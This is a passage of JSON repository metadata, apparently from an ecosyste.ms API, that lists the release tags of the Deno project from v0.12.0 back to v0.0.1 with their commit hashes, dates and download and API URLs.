https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","d